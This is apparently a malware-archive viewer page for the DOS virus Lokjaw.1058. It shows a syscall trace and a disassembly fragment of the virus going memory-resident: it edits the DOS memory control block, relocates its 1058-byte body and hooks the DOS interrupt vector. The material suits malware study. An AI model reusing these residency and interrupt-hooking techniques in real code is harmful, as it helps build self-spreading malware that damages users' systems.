Sample viewer

vx.netlux.org/Virus.DOS.Lokjaw.1058

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:46:27.591170804Z 44 PC: 12ba9 | Get time 0x12ba9: cmp ax, 0xdcd
0x12bac: je 0x12c0a
0x12bae: mov ax, cs
0x12bb0: dec ax
0x12bb1: mov ds, ax
0x12bb3: cmp byte ptr [0], 0x5a
0x12bb8: jne 0x12c02
0x12bba: mov ax, word ptr [3]
0x12bbd: sub ax, 0x100
0x12bc0: mov word ptr [3], ax
0x12bc3: mov bx, ax
0x12bc5: mov ax, es
0x12bc7: add ax, bx
0x12bc9: mov es, ax
0x12bcb: mov cx, 0x422
0x12bce: mov ax, ds
0x12bd0: inc ax
0x12bd1: mov ds, ax
0x12bd3: lea si, word ptr [bp + 0x106]
0x12bd7: lea di, word ptr [0x100]
2018-12-17T22:46:27.594606604Z 53 PC: 12bec | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:46:27.597072492Z 37 PC: 12c01 | Set interrupt vector (Interrupt = '33' AKA 'Random read')